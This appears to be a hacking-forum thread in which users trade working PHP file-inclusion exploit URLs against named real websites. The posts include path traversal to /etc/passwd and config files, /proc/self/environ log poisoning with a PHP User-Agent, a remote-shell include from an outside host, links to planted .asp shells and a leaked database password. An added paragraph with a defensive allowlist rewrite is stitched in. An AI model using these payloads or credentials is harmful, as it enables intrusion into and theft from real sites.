PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.summerschoolalpbach.at/index.php?file=.htaccess
     
  2. nemaniak

    nemaniak Elder

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://aren.org/newsletter/2007-litha/action.php?num=../../../../../../../../../etc/passwd%00
    POST
     
  3. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    http://www.filllpg.co.uk/index.php?page=/etc/passwd
     
  4. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00
     
  5. nemaniak

    nemaniak Elder

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://shareaza.sourceforge.net/?id=../../../../../../../../../../etc/passwd%00
     
  6. jrxsystem

    jrxsystem Banned

    Joined:
    6 Jan 2011
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.theschoolhouseinn.net/pkg/includes/cart.inc.php?dir_path=http://kabooos.persiangig.com/shell/2010.txt?
    http://www.kamparkab.go.id/index.php.../etc/passwd%00
    http://dev.peliton.net/Portals/0/h.asp;.jpg.jpg
    http://navymemorial.org/Portals/0/Mast3rJ0int.asp;.jpg
    http://www.vsa-software.com/mlsportfolio/index.php?content=../../../../../../etc/passwd%00
    http://www.cazino-monteoru.ro/index.php?pg=../../../../etc/passwd
     
    1 person likes this.
  7. dirtybiz

    dirtybiz New Member

    Joined:
    28 Oct 2010
    Messages:
    28
    Likes Received:
    3
    Reputations:
    0
    PR ~6, almost 20,000 pages in the index :) maybe it will be useful to someone)
     
  8. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://www.tierhilfe-spanien.de/thspa.php?inc=../../../../../../../etc/passwd%00
    http://www.albersfoundation.org/Albers.php?inc=../../../../../../../../../etc/passwd%00
     
    #1228 Gedj, 24 Jan 2011
    Last edited by a moderator: 24 Jan 2011
  9. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    h_ttp://www.kemtipp.ru/show.php?f=../../../../etc/passwd
     
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.sintraems.org.br/main.php?pg=/proc/self/environ

    Header:

    Code:
    Host
    User-Agent: <?php phpinfo(); ?>
    Accept
    Accept-Language
    Accept-Encoding
    Accept-Charset
    Keep-Alive
    Connection
    
     
    1 person likes this.
  11. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://www.ra-dar.ru/index.php?path=../../../../etc/passwd
    http://www.ra-dar.ru/index.php?path=../htdocs/
    
     
    1 person likes this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.racetools.de/index.php?page=/etc/passwd
    http://www.soulbrasil.com/index.php?page=/proc/self/environ
    http://www.eschoolbc.com/?page=../../../../../../../../../../proc/self/fd/2%00
    http://www.undp.org.al/index.php?page=../../../../../../../../../../proc/self/fd/14%00
    http://www.bornathleticstore.com/blog.php?page=../../../../../../../../../proc/self/environ
    http://www.modelspromo.com/index.php?page=../../../../../../../../../../../../etc/my.cnf
    http://www.placeneeded.com/index.php?page=../../../../../../../../../../var/log/dmesg
    http://www.keewatinmaritimemuseum.com/?page=../../../../../../../../../../../proc/self/fd/7
    http://www.gardenhoodatlanta.com/admin/index.php?page=../../../../../../../../proc/self/fd/1
    http://www.khandelwalweds.com/index.php?id=../../../../../../../../proc/self/maps
    http://www.asuslaptop.com/index.php?page=../../../../../../../../../proc/sys/../self/cmdline
     
    4 people like this.
  13. nemaniak

    nemaniak Elder

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://www.avionews.com/index.php?corpo=../../../../../../../../../../etc/passwd
     
  14. Lestatkiy

    Lestatkiy Member

    Joined:
    27 Sep 2010
    Messages:
    50
    Likes Received:
    22
    Reputations:
    5
    http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

    PHP:

    <?php
    //ini_set('display_errors', 1);
    //error_reporting(E_ALL);
        /*
            index.php
            Author:            Harry Helmich
            Created:        2006
            Description:    Primary controller for the application.

            Log:
            harry        2006-10-13    Added session processing.
            harry        2006-11-09    Code formatting.
            Alyssa        2007-06-28    Added code to check for php attacks
        */

        // Start a session for user tracking.
        @session_start();

        include_once("util/form_functions.php");

        if ( !isset($_SESSION['bLoggedIn']) || empty($_SESSION['bLoggedIn']) ){
            $_SESSION['bLoggedIn'] = false;

            /* Check if the user has set cookies through Remember Me */
            if(isset($_COOKIE['MPUserName']) && isset($_COOKIE['MPPassword'])){
                $userid = $_COOKIE['MPUserName'];
                $password = $_COOKIE['MPPassword'];
                $_POST['userid'] = $userid;
                $_POST['password'] = $password;
                login($userid, $password);
            }
        }

        // Display the header
        require_once("header.php");
        //echo '<div class="content">';

        /*
            Check for the page variable.  If it is empty or
            uninitialized, set its value to the default or
            home page.
        */
        if ( isset($_GET['page']) || !empty($_GET['page']) )
        {
            $page = $_GET['page'];
        }else{
            $page = "home";
        }

        // "Sanity check": only rejects page names that contain the string "http"
        $sanitycheck = strpos($page, "http");

        if ($sanitycheck === false) {
            // Include the specified page.
            //include(realpath(basename($page)));
            include($page.".php");
        }
        else {
            die("Possible PHP Injection Attack");
        }

        //echo "</div>";

        // Display the footer
        require_once("footer.php");
    ?>

    interesting protection )
     
    3 people like this.
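The check in the controller above only refuses a page name that contains "http", so traversal sequences and php:// wrappers (as in the filter URL at the top of the post) go straight into include(). Below, as an added example that is not code from the thread or from the site, is the same controller logic rebuilt around an allowlist of known page names; the page list and the pages/ directory are assumptions.

```php
<?php
// Added example (not the site's code): allowlist-based page dispatch
// replacing the strpos($page, "http") check. Paths and page names are assumed.

/**
 * Map a user-supplied page name to a controller file, or return null when
 * it is not one of the known pages. The request value is compared against
 * the allowlist and never used to build the path, so "../", "%00" and
 * php:// wrappers simply fail the lookup.
 */
function resolve_page(string $requested, array $allowed, string $base): ?string
{
    // Strict comparison; no normalisation of user input before the check.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    return $base . '/' . $requested . '.php';
}

$allowedPages = ['home', 'about', 'contact', 'schedule']; // assumed page list
$baseDir      = __DIR__ . '/pages';                        // assumed location

$page = (isset($_GET['page']) && $_GET['page'] !== '')
    ? (string) $_GET['page']
    : 'home';

$target = resolve_page($page, $allowedPages, $baseDir);
if ($target === null) {
    // Unknown page: log the rejected value for detection, reveal nothing else.
    error_log('Rejected page parameter: ' . $page);
    http_response_code(404);
    exit('Page not found');
}

require_once 'header.php';
include $target;
require_once 'footer.php';
```

Because the include path is taken from the allowlist rather than from the request, allow_url_include and magic-quotes settings no longer decide whether the controller is exploitable.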
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    file reader

    http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

    PHP:
    <?php
    $Query = mysql_connect("localhost", "twinkles_VTDB", "reTEP58") or die("Vintage Toys is not available at the moment.  Please try again later.");
    mysql_select_db("twinkles_vintagetoys", $Query);
    ?>
     
    4 people like this.
  17. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    [IP 208.125.234.183]
    Code:
    http://web2.paulsmiths.edu/PAGE=../etc/passwd
     
  18. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00
    Enjoy!
     
    #1238 LiRvD082, 18 Apr 2011
    Last edited by a moderator: 18 Apr 2011
    2 people like this.
  19. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    LFI :: kruta.ee :: PR - 3
    Code:
    _http://www.kruta.ee/main.php?lang=est&pg=../../../../../../data03/virt6224/domeenid/www.kruta.ee/htdocs/func
     
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://people.clarkson.edu/~williaem/ew/home2.php?file=/etc/passwd
    allow_url_include = on + no filtering at all
     
    2 people like this.